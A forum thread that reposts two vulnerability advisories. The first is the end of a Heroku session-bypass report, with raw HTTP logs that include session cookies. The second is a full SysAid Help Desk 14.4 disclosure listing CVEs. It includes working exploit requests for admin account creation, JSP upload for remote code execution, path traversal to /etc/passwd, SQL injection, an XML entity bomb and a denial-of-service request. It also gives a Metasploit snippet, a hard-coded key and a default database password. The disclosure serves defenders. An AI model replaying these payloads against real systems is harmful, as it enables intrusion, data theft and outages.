user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5pYkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZYUk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJIVmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwyVUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZIWm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBtTjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09WVTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVGWVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIwOVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hVVkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2NscFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpqYkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01rNU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dyY25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNtMXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzltTTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFrUTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWREbHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01HaGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pOWkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZmNmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D] Connection[keep-alive] Response Header: Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:48 GMT] Content-Type[text/html; charset=utf-8] Transfer-Encoding[chunked] status[302 Found] Strict-Transport-Security[max-age=31536000] Location[https://dashboard.heroku.com/login] Cache-Control[must-revalidate, no-cache, no-store, private] Pragma[no-cache] Expires[0] X-Frame-Options[SAMEORIGIN] x-ua-compatible[IE=Edge,chrome=1] Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly] x-request-id[5e276c4f-1382-4328-ae95-b87a73376089] x-runtime[0.006972] x-rack-cache[miss] Via[1.1 vegur] 17:56:39.215[207ms][total 207ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9rS2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1laWTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZMjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFyY0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1TysvaHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZwZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9lUU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRyNnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQreGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pLZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365] Connection[keep-alive] If-None-Match["015d655373394c49a35217e89173847e"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:49 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["015d655373394c49a35217e89173847e"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly] x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359] x-runtime[0.027082] Via[1.1 vegur] 17:56:48.969[192ms][total 192ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D] Connection[keep-alive] If-None-Match["809917d3d9ac788b43864dd9470788d6"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:59 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["809917d3d9ac788b43864dd9470788d6"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVvekVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUWGZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZWE9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZkl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2bmJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93SkVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsNURYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly] x-request-id[433e3190-bc29-4192-9a61-90754e41bb44] x-runtime[0.029809] Via[1.1 vegur] Reference(s): https://dataclips.heroku.com/ https://dataclips.heroku.com/clips/new https://postgres.heroku.com/databases - https://dashboard.heroku.com/account https://dashboard.heroku.com/login https://id.heroku.com/logout Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials. The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials. Security Risk: ============== The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Sursa https://dl.packetstormsecurity.net/1506-exploits/VL-1323.txt
  14. Hi, tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed. Full advisory below, and a copy can be obtained at [1]. 5 Metasploit modules have been released and currently awaiting merge in the moderation queue [2]. Regards, Pedro [1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5470 https://github.com/rapid7/metasploit-framework/pull/5471 https://github.com/rapid7/metasploit-framework/pull/5472 https://github.com/rapid7/metasploit-framework/pull/5473 https://github.com/rapid7/metasploit-framework/pull/5474 >> Multiple vulnerabilities in SysAid Help Desk 14.4 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 03/06/2015 / Last updated: 03/06/2015 >> Background on the affected product: "SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance." Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon. All vulnerabilities affect both the Windows and Linux versions unless otherwise noted. >> Technical details: 1) Vulnerability: Administrator account creation CVE-2015-2993 (same CVE as #10) Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 This creates an account with the following credentials: mr_lit:secret Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted. 2) Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution) CVE-2015-2994 Constraints: valid administrator account needed (see #1 to create a valid admin account) Affected versions: unknown, at least 14.4 POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------81351919525780 -----------------------------81351919525780 Content-Disposition: form-data; name="activation"; filename="whatevs.jsp" Content-Type: application/octet-stream <html><body><%out.println(System.getProperty("os.name"));%></body><html> -----------------------------81351919525780-- The response returns a page which contains the following: var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501"; var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501"; if(imageUrl != null && $.trim(imageUrl).length > 0) { document.getElementById("cropbox").src = imageUrl; document.getElementById("preview").src = thumbUrl; parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp"; Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP. 3) Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution) CVE-2015-2995 Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details. Affected versions: unknown, at least 14.3 and 14.4 POST /sysaid/rdslogs?rdsName=../../../../sample.war%00 <... WAR payload here ...> 4) Vulnerability: Arbitrary file download CVE-2015-2996 (same CVE as #8) Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path) Affected versions: unknown, at least 14.4 GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd 5) Vulnerability: Path disclosure CVE-2015-2997 Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4; only works on the Linux version POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters> Metasploit PoC: large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))), 'ctype' => 'application/octet-stream', 'vars_get' => { 'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)), 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) } }) The response (res.body.to_s) will be similar to: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD><TITLE>Error</TITLE></HEAD> <BODY> <H1>Internal Error No#14</H1> <H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2> </BODY></HTML> The tomcat path is revealed between the H2 tags. 6) Vulnerability: Use of hard-coded cryptographic key CVE-2015-2998 Constraints: N/A Affected versions: unknown, at least 14.4 SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file. Algorithm: DES password based encryption with MD5 hash Key: "inigomontoya" Salt: [-87, -101, -56, 50, 86, 53, -29, 3] Iterations: 19 7) Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp CVE-2015-2999 Constraints: valid administrator account needed Affected versions: unknown, at least 14.4 a) POST /sysaid/genericreport HTTP/1.1 action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin Parameters: groupFilter action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no Parameters: customSQL action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin Parameters: customSQL (3 different payloads are shown because the reportName parameter seems to change which parameters have the injection) POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= Parameter: dir c) POST /sysaid/RFCGantt.jsp HTTP/1.1 listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true Accepts injection between $$ in ganttSQL parameter. 8) Vulnerability: Denial of service CVE-2015-2996 (same CVE as #4) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 9) Vulnerability: XML Entity Expansion (leading to denial of service) CVE-2015-3000 Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 a) POST /sysaid/agententry?deflate=0 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> POST /sysaid/rdsmonitoringresponse <lol bomb in POST data> c) POST /sysaid/androidactions <lol bomb in POST data> These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 10) Vulnerability: Uncontrolled file overwrite CVE-2015-2993 (same CVE as #1) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker. 11) Vulnerability: Use of hard-coded password for the SQL Server Express administrator account CVE-2015-3001 Constraints: N/A Affected versions: unknown, at least 14.4 When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1". >> Fix: Upgrade to version 15.2 or higher. Source
